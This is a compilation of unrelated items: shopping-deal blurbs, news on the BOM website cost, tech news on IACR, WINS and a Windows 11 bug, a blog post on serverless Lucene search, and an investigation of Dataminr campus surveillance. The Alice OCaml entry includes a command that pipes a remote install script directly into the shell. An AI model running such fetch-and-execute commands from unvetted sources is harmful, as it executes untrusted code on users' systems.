If you’re still holding out on buying an air fryer, here’s a rare chance to grab a big-name, big-capacity Ninja without the big price tag. Not quite so big, anyway. Rachel Ogden named the Double Stack XL “best compact air fryer” in her guide to the
best air fryers
, but with its 9.5L capacity and four cooking levels, this thing can cook a lot. Still not cheap, but far below its average price of £229.
You can spend about £500 on a premium blender, but this superb model from Braun costs below £200 even at full price – something our
best blenders
tester, Rachel Ogden, could hardly believe when she named it “best overall”. Hold on to your smoothie, Rachel, because it’s now less than £150, and not just at Amazon.
Tefal is known mostly for its ActiFry tech, so when Rachel Ogden crowned the Tefal Easy Fry Dual XXL as the
best air fryer
, it made sense. She found it to be a sublime all-rounder in her testing, handling both chips and frozen food very well. With an 11-litre capacity, it’s also Tefal’s largest dual zone air fryer, making it handy for cooking a lot of food for larger families when you need to.
Crowned overall winner in Rachel Ogden’s missions to find the
best kettles
, this Bosch beauty now comes at a price offer you can’t refuse – and not just from Amazon. “A brilliant blend of robust form and function” wrote Rachel of this fashionably industrial-looking kettle, whose features include a low minimum boil (300ml), keep-warm setting and touch controls. Now its lowest price ever, in white or black.
One of your favourite Filter recommendations of the year, this gentle
sunrise alarm clock
will wake you up with kittens purring, birdsong, gently brightening light – or a plain old alarm sound if you prefer. It’s been around for a few years and saw a price hike in 2022 (cost-of-waking-up crisis?) before settling at just under £50 from most retailers, so this is a deal worth grabbing.
Water flosser
Waterpik Ultra Professional, from £59.99 (was £91)
Blast the gunk from your gums without having to grapple with floss. The Waterpik Ultra is a countertop model so it takes up more space than the cordless type, but this gives it more versatility and saw it score top marks with our
water flosser
tester Alan Martin. If you’d rather avoid Amazon, you can find it discounted by other retailers, albeit not by as much.
The best IPL device
Philips Lumea 9900 BRI951/01, £377.99 (avg £501.33)
IPL (intense pulsed light) hair remover devices promise to banish stubbly regrowth without the pain of waxing and epilation – at a price. The Philips Lumea 9900, Lise Smith’s pick for
best IPL device
overall, has cost as much as £599.99 for much of the year, and occasional discounts rarely go below £450. Amazon’s current price shaves more than £40 off any other Black Friday deal we’ve found for this version, which comes with four attachments.
The best beauty deals
A bargain beauty Advent calendar
W7 Beauty Blast Advent calendar, £16.95 (was £19.95)
Advent calendars are a Christmas staple, and we’ve seen lots of brands try to put a different spin on them in the past – beauty Advent calendars are some of the most prominent. This W7 Beauty Blast calendar provides excellent value for money at a deal-busting £16.95 from Amazon, especially as it provides genuinely useful products for most folks. The likes of the eyeshadows, primers, lip balms and such are travel-size, but apart from that, Sarah Matthews had little cause for complaint in her ranking of the
best beauty Advent calendars
.
The Bureau of Meteorology's (BOM) flawed and expensive redesigned website will come under renewed scrutiny, with the federal environment minister asking the agency's new boss to closely examine how it all went so wrong, and report back to him.
It comes amid revelations that the new website cost more than $96 million to design — a far cry from the $4 million figure it originally claimed had been spent.
Users found it difficult to navigate, and also criticised the changes to the radar map, which made place names hard to read.
BOM users, farmers in particular, were critical of the changes made to the radar map. (ABC Rural: Justine Longmore)
Farmers were scathing, as they were unable to locate rainfall data.
The federal government was forced to intervene, ordering the agency to fix the website.
The site has since reverted to the old version of the radar map and other tweaks have been made to the site, with further changes to be rolled out.
In a statement provided to the ABC, the BOM admitted "the total cost of the website is approximately $96.5 million".
'Complete rebuild necessary'
It said the cost breakdown included $4.1 million for the redesign, $79.8 million for the website build, and the site's launch and security testing cost $12.6 million.
"A complete rebuild was necessary to ensure the website meets modern security, usability and accessibility requirements for the millions of Australians who reply on it every day," a spokesperson said.
The spokesperson also said it had "continued to listen to and analyse community feedback" since the launch of the new website on October 22.
The BOM says it continues to listen to and analyse community feedback. (ABC News: Greg Bigelow)
Nine days after the launch it changed the radar map back to what it had previously been.
"This brought back the visual style that the community said they found intuitive and reliable for interpreting weather conditions,"
a spokesperson said.
"This option was already available on the new site but not as the default setting when visiting the page.
"On 7 November we implemented changes to help the community find important fire behaviour index information."
Future changes were also in the pipeline in response to community feedback, according to the spokesperson, but some updates had been paused due to Severe Tropical Cyclone Fina in northern Australia.
Minister's expectations 'have been made very clear'
Environment Minister Murray Watt said he had met twice in the past week with the new CEO Stuart Minchin to reiterate his concerns about the bungled process and the cost.
The environment minister says he has met twice with the BOM's new boss. (ABC News: Callum Flinn)
He has asked Mr Minchin to report back to him on the issue.
"I don't think it's secret that I haven't been happy with the way the BOM has handled the transition to the new website," he told reporters on Sunday.
"I met with him on his first day and during the week just gone, to outline again that I think the BOM hasn't met public expectations, both in terms of the performance of the website and the cost of the website.
"So I've asked him as his first priority to make sure that he can get on top of the issues with the website — the functionality — and I'm pleased to see they've made changes.
"But I've also asked him to get on top of how we got to this position with this cost, with the problems.
"He's only been in the job for a week but I think my expectations have been made very clear."
The minister has asked new BOM boss, Stuart Minchin, to prioritise the issues with the website. (Supplied: BOM)
However the minister stopped short of describing the website as a sheer waste of money, saying he would wait to hear back from Mr Minchin before commenting.
"Before leaping to judgement, I want to see what the new CEO of the BOM has been able to establish as to the reasons for those cost increases and I'll make my judgement at that point in time."
'Another Labor disaster'
Nationals leader David Littleproud said there should be "consequences" after the revelations about the true cost of the website.
"It is unbelievable a private consultancy was paid $78 million to redesign the website," Mr Littleproud said.
"But then security and system testing meant that Australian taxpayers actually paid $96 million for what was nothing more than another Labor disaster,.
"The seriousness of this cannot be understated. This isn't just about a clunky website, the changes actually put lives and safety at risk.
"The new platform did not allow people to enter GPS coordinates for their specific property locations, restricting searches to towns or postcodes.
"Families and farmers could not access vital, localised data such as river heights and rainfall information and this missing data created panic and fear across communities.
"But now, the fact the BOM has been hiding the true cost of its white elephant and initially lying about the total figure is deeply concerning, considering that the BOM should be all about trust."
IACR Nullifies Election Because of Lost Decryption Key
Schneier
www.schneier.com
2025-11-24 12:03:46
The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Mot...
The International Association of Cryptologic Research—the academic cryptography association that's been putting on conferences like Crypto (back when "crypto" meant "cryptography") and Eurocrypt since the 1980s—had to nullify an online election when trustee Moti Yung lost his decryption key.
For this election and in accordance with the bylaws of the IACR, the three members of the IACR 2025 Election Committee acted as independent trustees, each holding a portion of the cryptographic key material required to jointly decrypt the results. This aspect of Helios’ design ensures that no two trustees could collude to determine the outcome of an election or the contents of individual votes on their own: all trustees must provide their decryption shares.
Unfortunately, one of the three trustees has irretrievably lost their private key, an honest but unfortunate human mistake, and therefore cannot compute their decryption share. As a result, Helios is unable to complete the decryption process, and it is technically impossible for us to obtain or verify the final outcome of this election.
The group will redo the election, but this time with a 2-of-3 threshold scheme for decrypting the results, instead of requiring all three trustees.
Microsoft to remove WINS support after Windows Server 2025
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 11:47:01
Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034. [...]...
Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034.
The legacy WINS computer name registration and resolution service has been deprecated since the release of Windows Server 2022 in August 2021, when Microsoft stopped active development and work on new features.
Windows Server 2025 will be the final Long-Term Servicing Channel release to come with WINS support, with the feature to be removed from future releases.
"WINS was officially deprecated since Windows Server 2022 and will be removed from all Windows Server releases following Windows Server 2025,"
Microsoft announced
on Friday.
"Standard support will continue through the lifecycle of Windows Server 2025, until November 2034. We encourage you to migrate to modern Domain Name System (DNS)-based name resolution solutions before then."
Once removal takes effect, Windows Server will no longer include the WINS server role, the WINS management console snap-in, the WINS automation APIs, and related interfaces.
Microsoft highlighted several reasons for eliminating WINS support, including DNS's superior scalability and compliance with modern internet standards, and it noted that DNSSEC provides security protections against cache poisoning and spoofing attacks that WINS/NetBIOS cannot mitigate.
It also added that modern Microsoft services, including Active Directory, cloud platforms, and Windows APIs, rely on DNS for name resolution.
Organizations still dependent on WINS are advised to immediately begin auditing services and applications that still rely on NetBIOS name resolution and migrate to DNS with conditional forwarders, split-brain DNS, or search suffix lists to replace WINS functionality.
Microsoft also cautioned against temporary workarounds such as static host files, saying they don't scale and aren't sustainable for enterprise environments.
"Now is the time to review dependencies, evaluate DNS migration plans, and make informed decisions," Microsoft noted.
"Organizations relying on WINS for NetBIOS name resolution are strongly encouraged to begin migration planning immediately to avoid disruptions."
I put a search engine into a Lambda, so you only pay when you search
Modern serverless search is just an accounting trick. There’s a hidden pool of nodes behind the API, and the final bill is split evenly among all clients. There’s always a standby warm node waiting for your request - you just don’t see it.
And you can’t get rid of it because scaling search engines is HARD (or at least search vendors want you to think so). You can’t just put one into a Lambda function. But what if you actually can?
As someone who has hated Elasticsearch since version 0.89 (but still uses it), I see three major blockers to running it in a truly serverless mode:
Container size
: It’s around 700MB in version 9.x. The bigger the container, the slower the node startup, since it has to be pulled from somewhere.
Container startup time
: For ES 9.x, the startup time alone is about 40 seconds. And the time-to-performance is much worse, since a cold JVM is painfully slow until it sees some traffic.
Index and state
: Search engines like Elastic and Qdrant behave like databases, with each node hosting a fraction of the total cluster state. When a new node joins, the cluster needs to rebalance. What happens if you scale-to-zero? Better not ask.
We're going to take my pet-project-gone-big search engine, Nixiesearch, and squeeze it into an AWS Lambda:
It's also JVM-based, since it uses Apache Lucene for all search-related internals (like OpenSearch, Elasticsearch and SOLR).
We're going to build a native x86_64 binary with GraalVM native-image: this should reduce the Docker image size (no JVM!) and eliminate JVM warmup entirely.
Can we store an index outside the search engine?
Can we achieve reasonable latency with AWS S3? What if we host the index on AWS EFS instead?
You may wonder why we would ever need to perform weird AWS Lambda tricks when we can just keep the status quo with warm stand-by nodes. No warm-up, no cold start, no obscure limits - it's a good traditional approach.
Because doing weird stupid things is the way I learn. So the challenge is to have a proof-of-concept which:
Has minimal startup time, so scaling up and down won't be an issue. With sub-second startup you can even scale to zero when there's no traffic!
Search latency is going to be reasonably fast. Yes, modern search engines compete on 3 vs 5 milliseconds, but in practice you also have a chonky embedding model, which adds an extra 300-400ms of latency on top.
Java AOT compilation and remote index storage, sounds easy.
GraalVM native-image is an Ahead-Of-Time compiler: it takes a JVM application JAR file and builds an almost zero-dependency native binary that depends only on glibc. It sounds fancy in theory, but in practice not all applications can be statically compiled that easily.
Accessing a field reflectively in Java. If you do this, you're probably doing something wrong.
If you (or your transitive dependencies) use reflection to do something dynamic like enumerating class fields or loading classes dynamically, then GraalVM requires you to create a reflect-config.json file listing all the nasty things you do.
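To make this concrete, here is a minimal, hypothetical sketch of the kind of reflective code the AOT compiler cannot see through; the class name is a made-up placeholder, not anything from Nixiesearch. Without a matching reflect-config.json entry, the Class.forName call simply fails inside the native binary.

import java.lang.reflect.Field;

public class ReflectionExample {
    public static void main(String[] args) throws Exception {
        // Loading a class by name and enumerating its fields at runtime:
        // invisible to static analysis, so native-image needs it declared up front.
        Class<?> clazz = Class.forName("ai.example.SearchConfig"); // hypothetical class name
        for (Field field : clazz.getDeclaredFields()) {
            System.out.println(field.getName() + ": " + field.getType().getSimpleName());
        }
    }
}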
Example of reflect-config.json
Building such a file manually for all transitive dependencies is practically impossible. But in modern GraalVM versions you can attach a tracing agent to your application, which records all the nasty things happening throughout the entire codebase.
The tracing agent needs to observe all execution paths in your application, and instead of sending all possible search requests manually, I just attached it to the test suite — and got a monumental reachability-metadata.json file that hopefully covers all reflection usage in transitive dependencies.
It’s time to build our first native binary!
A real native-image command-line.
It takes around two minutes on my 16-core AMD Zen 5 CPU to compile the binary, which is impressively slow. With an ubuntu:24.04 minimal base image we get 338MB — a nice reduction from 760MB.
The musl-based binary ends up at the same 244MB, but now it can run natively on Alpine without the gcompat glibc layer. But can we go even further and build the app completely statically, without linking libc at all? Once you start trimming dependencies, it's hard to stop.
Now we're at 248MB, but we no longer need a base system at all - which gives us the most perfect Docker image ever:
FROM scratch
COPY --from=builder /build/nixiesearch /nixiesearch
ENTRYPOINT ["/nixiesearch"]
We could go even further and enable the -Os option to optimize for size, but I'm afraid it might impact request processing performance.
How I went from 760MB docker image to just 205MB.
GraalVM also notes that almost 30% of the codebase is taken up by the AWS Java SDK with its massive dependency footprint, so the next step is switching to the raw S3 REST API instead of the nice SDK helpers.
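For a sense of what "raw REST" means here: a GetObject call is ultimately just an HTTP GET against the bucket endpoint, which Java's built-in HttpClient can do without any SDK. The sketch below is illustrative and assumes a presigned URL (a placeholder), so it skips the SigV4 request signing that the SDK normally handles for you.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class S3RawGet {
    public static void main(String[] args) throws Exception {
        // Placeholder presigned URL: in a real setup you would sign requests (SigV4) yourself.
        String presignedUrl = "https://example-bucket.s3.amazonaws.com/index/segment0.cfs?presigned-query-here";
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest request = HttpRequest.newBuilder(URI.create(presignedUrl)).GET().build();
        // Read the whole object into memory; a large segment would be streamed instead.
        HttpResponse<byte[]> response = client.send(request, HttpResponse.BodyHandlers.ofByteArray());
        System.out.println("HTTP " + response.statusCode() + ", " + response.body().length + " bytes");
    }
}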
I originally thought that the AWS Lambda runtime for Docker is just a simple "docker pull" and "docker run" on each request, but it's slightly more complex:
Lambda API request lifecycle.
On initial code deployment, the container gets fetched from ECR, unpacked, and cached in all AWS AZs where your lambda is scheduled to run.
When the first request arrives, the container goes into the Init stage: it gets executed on a minimal Firecracker VM. The Lambda runtime waits until the started container polls the runtime API for the actual request to process. This stage is billed, so we need to be as fast as possible here.
Request stage: the container polls the runtime API for a request and produces the response. This is where the actual work happens, and this is the part you're also billed for.
And here is the MAGICAL Freeze stage: after the Lambda API receives a response and sees that the app has started polling for the next request, the VM gets frozen. It's still a VM, but with zero CPU and its RAM offloaded to disk. You pay zero for a container in the freeze stage.
When a new request arrives, the container VM goes into the Thaw stage: it is unfrozen, processes the next request, and eventually gets frozen again.
When no requests arrive for a longer period of time (in practice 5-15 minutes), the Lambda container gets destroyed.
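The "polls the runtime API" part is what a custom runtime does in a loop. A rough illustrative sketch using only the standard HttpClient is shown below; the endpoints are the documented Lambda runtime API paths, while error reporting and the actual search call are omitted.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class RuntimeLoop {
    public static void main(String[] args) throws Exception {
        // AWS_LAMBDA_RUNTIME_API is injected by the Lambda environment (host:port).
        String api = "http://" + System.getenv("AWS_LAMBDA_RUNTIME_API") + "/2018-06-01/runtime";
        HttpClient client = HttpClient.newHttpClient();
        while (true) {
            // Long-poll for the next invocation; between invocations the VM may be frozen.
            HttpResponse<String> next = client.send(
                HttpRequest.newBuilder(URI.create(api + "/invocation/next")).GET().build(),
                HttpResponse.BodyHandlers.ofString());
            String requestId = next.headers().firstValue("Lambda-Runtime-Aws-Request-Id").orElseThrow();
            String result = "{\"ok\":true}"; // run the actual search here instead
            // Post the result back for this invocation.
            client.send(
                HttpRequest.newBuilder(URI.create(api + "/invocation/" + requestId + "/response"))
                    .POST(HttpRequest.BodyPublishers.ofString(result)).build(),
                HttpResponse.BodyHandlers.ofString());
        }
    }
}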
Cold request (full init):
Duration: 84.15 ms
Billed Duration: 535 ms
Memory Size: 3008 MB
Max Memory Used: 133 MB
Init Duration: 449.85 ms
Warm request (after freeze-thaw cycle):
Duration: 2.62 ms
Billed Duration: 3 ms
Memory Size: 3008 MB
Max Memory Used: 194 MB
That's nice: we were able to spin up the cold container in only 449ms, and warm no-op requests take just 3ms!
But note that AWS Lambda compute is very limited:
RAM: 128MB default with up to 3008MB max. You can submit a support ticket to get 10GB RAM, but I was too lazy to argue with AWS support.
vCPU: 1 vCPU, and if you go beyond 1536MB of RAM, you get a 2nd vCPU. Not much.
Disk: up to 10GB of instance storage.
And last but not least, S3 read throughput depends on RAM size: the S3 throughput data is well aligned with known S3 throughput limits for AWS EC2 instances. Assuming that we have only 2 vCPUs max, 100MB/s is the best you can expect - which is not great considering that to run a search we need to access the index.
Nixiesearch was always built with S3 block storage in mind. But like OpenSearch (and perhaps Elasticsearch Serverless), it uses S3 only for simple segment replication:
Segment replication with AWS S3.
As lambdas are ephemeral, we need to somehow deliver the index to the search engine:
We can directly wrap all Lucene index access into S3 GetObject calls. This might work, but HNSW vector search is an iterative graph traversal, which will ruin the latency. Slow (and expensive, due to ~500 S3 reads per request) search, but no init time. But it sounds serverless!
We can do good old segment replication from S3 to Lambda ephemeral storage. Then, for a 2GB index and an expected 100MB/s throughput, our init time is going to be 2GB / 0.1GB/s = 20 seconds. But after that the search speed is going to be perfect, with no extra costs.
Napkin storage costs math for 1M requests:
Direct S3 search with no caching: 500 S3 reads per request * 1M requests * 0.0004$/1000 reads = 200$/month. Yes, running an ES cluster is more expensive, but not by much.
Segment replication: considering that 1M requests/month is around 0.5rps, your lambda function is going to be always warm and there are no repeated inits - you fetch the index once and only refresh changed segments. Then the cost is going to be around 0$.
I don't like the idea of an init taking half a minute - then we're not much different from good old Elastic. But what if we host the index on NFS (e.g. AWS EFS) storage?
AWS EFS: 1MB of data read per search request * 1M requests * 0.03$/GB = 30$/month. Now the math makes more sense: we have zero init time, but extra latency for all disk access.
I took the FineWiki "simple" part with 300k documents, embedded them with the OpenAI text-embedding-3-small model, and deployed it on an AWS Lambda with EFS storage attached.
Blue gradient background is like an em-dash of vibe-coded front-ends.
There's a nice server+client side latency breakdown if you want to see where the actual time is spent. And yes, 1.5s first-request latency is kinda slower than I initially expected.
In simple words, random reads from NFS-style storage are just slow:
breakdown of a sample request
As my test lambda runs in AWS us-east-1 and I'm physically in the EU, latency can be improved by replicating the lambda to more regions. Embedding latency is the AI toll we have to pay anyway. But why are the search and fetch stages so slow?
One of the reviewers of this post suggested baking the whole index directly into the docker image as an alternative: yes, you can no longer easily update the index in real time - you need to rebuild the Docker image from scratch every time it changes. But it may work in cases where you can tolerate some lag in indexing. The results we got were even more surprising:
When you thought AWS EFS was slow, you should try baking index into docker image.
I thought 1.5s request latency with AWS EFS was slow, but random reads across an index baked directly into the docker image were even slower. Why? Because lambdas do not run docker images as-is: they unpack them and cache them in an AZ-local S3 block cache:
In other words, baking the index into a docker image is just another way of storing your index in an AZ-local S3 Express bucket (and mounting it with s3-fuse or something).
Realistically 1.5s (and even 7s) per cold search might sound horrible, but things get fast pretty quickly as we eventually load cold data into a filesystem cache:
The image above is for the Docker-bundled index, but for an EFS/NFS-attached index it's quite similar.
We get to a reasonable 120ms latency for search and an almost instant field fetch around request #10. But it's still far from the idealistic idea of true serverless search, where you don't need an idling warm node to be up to serve your request.
Folks like turbopuffer, topk and LanceDB advocate the idea that to run on top of S3 you need another, non-HNSW data structure like IVF, which is more friendly to high access latency.
Instead of navigating the HNSW graph, iteratively doing a ton of random reads, you can just cluster documents together and only perform batch reads of the clusters lying nearest to your query:
Much easier search implementation without any iterative random-read patterns: just read a complete set of cluster documents in a single S3 GetObject request.
Clusters can be updated in place by just appending new documents.
The elephant in the room: IVF has much, much worse recall, especially for filtered search. So your search can be either fast or precise; you have to choose in advance.
Yes, I could just hack IVF support into Nixiesearch (as Lucene already supports flat indexes), but there's a better way. S3 has almost unlimited concurrency: can we untangle reads from being iterative to being batched and concurrent?
Traversing HNSW graph for K-NN search is iterative:
You land on an entrypoint node, which has M connections to other neighbor nodes.
For each connection, you load its embedding (doing an S3 GetObject request) and compute a cosine distance.
After all M neighbor distances are evaluated, you jump to the best next node.
Sequential reads, oh no!
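In code, the sequential pattern looks roughly like the sketch below: one blocking S3 read per neighbor, inside the traversal loop. The bucket name, key layout and decode step are made up for illustration; this is not how Nixiesearch actually stores vectors.

import software.amazon.awssdk.core.ResponseBytes;
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.GetObjectRequest;
import software.amazon.awssdk.services.s3.model.GetObjectResponse;

public class SequentialNeighborScorer {
    private final S3Client s3 = S3Client.create();
    private final String bucket = "my-index-bucket"; // hypothetical

    // One blocking round-trip per neighbor: with M ~ 32-64 neighbors per node,
    // the sequential round-trips dominate the search latency.
    float[] loadEmbedding(int node) {
        ResponseBytes<GetObjectResponse> bytes = s3.getObjectAsBytes(
            GetObjectRequest.builder().bucket(bucket).key("vectors/" + node).build());
        return decode(bytes.asByteArray());
    }

    private float[] decode(byte[] raw) {
        return new float[0]; // placeholder: the on-disk vector format is out of scope here
    }
}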
But you don't need to be iterative while loading neighbor embeddings: Lucene's HnswGraphSearcher is already quite close to being bent in the direction of making embedding loads concurrent and parallel:
So my personal plan for the Christmas holidays is to add a custom Scorer implementation which schedules N parallel S3 GetObject requests to get N embeddings on each node visit:
An HNSW graph usually has only ~3 layers, so you need to evaluate 1 entrypoint + 3 layers = 4 nodes, doing 4 batches of ~32-64 S3 requests.
Each batch of S3 GetObject requests takes ~15ms, so the baseline latency for a complete search stage is expected to be ~60ms.
To fetch N documents, you also need to prefetch N chunks of stored fields, which is also a perfectly concurrent operation.
A theoretical ~100ms baseline latency for HNSW running on top of S3 - sounds nice, huh?
Usually at the end of an article a well-educated author puts a summary of what you might have learned while reading it, so here we are:
AWS Lambdas are not your friendly Docker containers: the storage system is completely different, and the runtime semantics, with constant freeze-thaw cycles, were what really surprised me.
Running HNSW search on top of network-attached storage is painfully slow right now - sequential random reads, you know. But there’s light at the end of the tunnel, and you don’t need to sacrifice recall to get cheap and fast search.
If you’re brave (and stupid) enough (like me) to spend a weekend on putting a search engine in a lambda, you can do it.
‘Extra challenging during a difficult time’: Robert Redford’s daughter criticises AI tributes to the late actor
Guardian
www.theguardian.com
2025-11-24 11:04:46
Amy Redford thanks fans for ‘love and support’ but takes issue with ‘AI versions of funerals, tributes and quotes from members of my family that are fabrications’ Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father, who died in Sep...
Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father,
who died in September
, calling them “fabrications”.
Redford posted a statement on social media
in which she thanked fans for their “overwhelming love and support”, adding: “It’s clear that he meant so much to so many, and I know that my family is humbled by the outpouring of stories and tributes from all corners of the globe.”
She went on to say: “There have been multiple AI versions of funerals, tributes and quotes from members of my family that are fabrications. Renderings of my dad who clearly has no say, and depictions of my family that do not represent anyone in a positive light are extra challenging during a difficult time.”
Redford said that no public funeral has taken place, and that a memorial to her father’s life is still being planned, saying: “Every family should have the ability to mourn, represent the person they lost, and pay homage in the way that fits their values and family culture best.”
Redford added: “My hope is to keep AI in the land of transparent usage where it belongs. There are many elements of it that were created with good intent. I simply ask, what if this was you? Let that be your guidepost.”
The Attention Economy Navigator, November 2025 w/ Nima Shirazi
OrganizingUp
convergencemag.com
2025-11-24 11:00:00
This week on the show we are debuting a new format we’re calling the Attention Economy Navigator. The goal of Block & Build has always been to help organizers figure out what’s happening, how people are responding, and get a sense for what’s working out there in the world. The Attention Economy ...
Microsoft: Windows 11 24H2 bug crashes Explorer and Start Menu
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 10:41:50
Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025. [...]...
Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025.
This bug affects users who log in after applying the cumulative updates and those using non-persistent operating system installations (such as virtual desktop infrastructure environments), where app packages must reinstall each session. On impacted systems, it causes issues for multiple essential Windows 11 shell components when XAML dependency packages fail to register properly after updates.
As Microsoft explained in a recent support document, applications that depend on XAML packages (specifically MicrosoftWindows.Client.CBS, Microsoft.UI.Xaml.CBS, and MicrosoftWindows.Client.Core) aren't registering in time after an update is installed, a timing issue that cascades through the system, preventing critical interface components from initializing properly.
This causes shell components such as Explorer.exe, StartMenuExperienceHost, and ShellHost.exe to crash with visible errors or fail silently, leaving users with partially functional systems that cannot display various navigation tools.
Affected users can experience a wide range of problems, including Start menu crashes (often accompanied by critical error messages), missing taskbars even when Explorer.exe is running, the core ShellHost (Shell Infrastructure Host or Windows Shell Experience Host) system process crashing, and the Settings app silently failing to launch.
"After provisioning a PC with a Windows 11, version 24H2 monthly cumulative update released on or after July 2025 (KB5062553), various apps such as StartMenuExperiencehost, Search, SystemSettings, Taskbar or Explorer might experience difficulties,"
Microsoft said
.
"The applications have dependency on XAML packages that are not registering in time after installing the update. We are working on a resolution and will provide more information when it is available."
Temporary workaround available
Microsoft said it is developing a resolution but has not provided a timeline for the fix. In the meantime, it has published PowerShell commands to manually register the missing packages.
Affected users must run three Add-AppxPackage commands, one for each affected XAML package, and then restart the system to restore functionality.
However, the bug particularly impacts organizations managing non-persistent enterprise environments using virtual desktop infrastructure, where employees must re-provision applications at each login.
For them, Microsoft recommends
running this logon script
on non-persistent OS installations that will execute before Explorer launches. The batch file wrapper ensures required packages are fully provisioned before the desktop environment loads, preventing the timing race condition.
What are you doing this week?
Lobsters
lobste.rs
2025-11-24 10:10:21
What are you doing this week? Feel free to share!
Keep in mind it’s OK to do nothing at all, too....
Alice is a radical, experimental
OCaml
build system and
package manager. Its goal is to allow anyone to
program in OCaml with as little friction as possible.
Install Alice by running the following command:
curl -fsSL https://alicecaml.org/install.sh | sh
Alternatively, see more installation options
here
.
Here’s how to run your first OCaml program on a computer with no pre-installed
OCaml tools (you will need a C compiler though!):
$ alice tools install
$ alice new hello
$ cd hello
$ alice run
Hello, World!
That first line downloads an OCaml compiler toolchain and a couple of
development tools (
ocamllsp
and
ocamlformat
). Skip it if you already have
an existing installation of OCaml. Alice runs the OCaml compiler
(
ocamlopt.opt
) found by searching the directories in your
PATH
variable and only
uses its own installation of the tools (installed by
alice tools install
) as
a fallback.
This project is exploring alternative approaches to OCaml packaging to those
chosen by
Opam
and alternative approaches to
building projects to those chosen by
Dune
.
How Corporate Partnerships Powered University Surveillance of Palestine Protests
Intercept
theintercept.com
2025-11-24 10:00:00
Officials at the University of Houston used Dataminr to surveil students, while University of Connecticut administrators voiced concerns over protests against a military contractor and major donor.
The post How Corporate Partnerships Powered University Surveillance of Palestine Protests appeared fir...
A cluster of tents
had sprung up on the University of Houston’s central lawn. Draped in keffiyehs and surrounded by a barricade of plywood pallets, students stood on a blue tarp spread over the grass. Tensions with administrators were already high before students pitched their tents, with incidents like pro-Palestine chalk messages putting university leaders on high alert.
What the students didn’t know at the time was that the University of Houston had contracted with Dataminr, an artificial intelligence company with a
troubling record
on
constitutional rights
, to gather open-source intelligence on the student-led movement for Palestine. Using an AI tool known as “First Alert,” Dataminr was scraping students’ social media activity and chat logs and sending what it learned to university administration.
This is the first detailed reporting on how a U.S. university used the AI technology to surveil its own students. It’s just one example of how public universities worked with private partners to surveil student protests, revealing how corporate involvement in higher education can be leveraged against students’ free expression.
This is the final installment in an investigative series on the draconian surveillance practices that universities across the country employed to crack down on the 2024 pro-Palestine encampments and student protests. More than 20,000 pages of documentation covering communications from April and May 2024, which The Intercept obtained via public records requests, reveal a systematic pattern of surveillance by U.S. universities in response to their students’ dissent. Public universities in California tapped
emergency response funds for natural disasters
to quell protests; in Ohio and South Carolina, schools received briefings from
intelligence-sharing fusion centers
; and at the University of Connecticut, student participation in a protest sent administrators into a frenzy over what a local military weapons manufacturer would think.
The series traces how universities, as self-proclaimed safe havens of free speech, exacerbated the preexisting power imbalance between institutions with
billion-dollar endowments
and a nonviolent student movement by cracking down on the latter. It offers a preview of the crackdown to come under the Trump administration as the president re-entered office and
demanded
concessions
from U.S. universities
in an attempt to limit pro-Palestine dissent on college campuses.
“Universities have a duty of care for their students and the local community,” Rory Mir, associate director of community organizing at the Electronic Frontier Foundation, told The Intercept. “Surveillance systems are a direct affront to that duty for both. It creates an unsafe environment, chills speech, and destroys trust between students, faculty, and the administration.”
At the University of Houston, the encampment was treated as an unsafe environment. University communications officials using Dataminr forwarded the alerts — which consist of an incident location and an excerpt of the scraped text — directly to the campus police. One alert sent by Dataminr to a University of Houston communications official identified a potential pro-Palestine incident based on chat logs it scraped from a semi-private Telegram channel called “Ghosts of Palestine.”
“University of Houston students rise up for Gaza, demanding an end to Genocide,” the chat stated. First Alert flagged it as an incident of concern and forwarded the information to university officials.
According to Dataminr’s marketing materials, First Alert is designed for use by first responders, sending incident reports to help law enforcement officials gather situational awareness. But instead of relying on officers to collect the intelligence themselves, First Alert relies on Dataminr’s advanced algorithm to gather massive amounts of data and make decisions. In short, Dataminr’s powerful algorithm gathers intelligence, selects what it views to be important, and then forwards it to the paying client.
A follow-up public records request sent to the University of Houston returned records of more than 900 First Alert emails in the inbox of a university administrator in April 2024 alone.
The AI company has been implicated in a number of scandals, including the domestic surveillance of
Black Lives Matter protesters
in 2020 and
abortion rights protesters
in 2023. The Intercept
reported
in April that the Los Angeles Police Department used First Alert to monitor pro-Palestine demonstrations in LA. First Alert is one, but not the only, service that Dataminr offers. From newsrooms to corporate giants, Dataminr’s powerful algorithms power intelligence gathering and threat response for those willing to pay.
“It’s concerning enough when you see evidence of university officials scrolling through individual student social media, that’s going to chill people’s speech,” said Nathan Wessler, deputy director of the ACLU’s Speech, Privacy, and Technology Project. “But it’s a whole other level of concern when you start contracting with these companies that are using some kind of algorithm to analyze, at scale, people’s speech online.”
The University of Houston and Dataminr did not respond to multiple requests for comment.
While the University
of Houston leaned on Dataminr to gather intelligence on the student-led movement for Palestine, it is just one example of the open-source intelligence practices used by universities in the spring of 2024. From screenshots of students’ Instagram posts to the use of on-campus surveillance cameras, the documents obtained by The Intercept illustrate how the broadening net of on-campus intelligence gathering swept up constitutionally protected speech in the name of “social listening.”
University communications officials were often left to do the heavy lifting of hunting down activists’ social media accounts to map out planned demonstrations. Posts by local Students for Justice in Palestine chapters of upcoming demonstrations were frequently captured by administrators and forwarded on. In other cases, university administrators relied on in-person intelligence gathering.
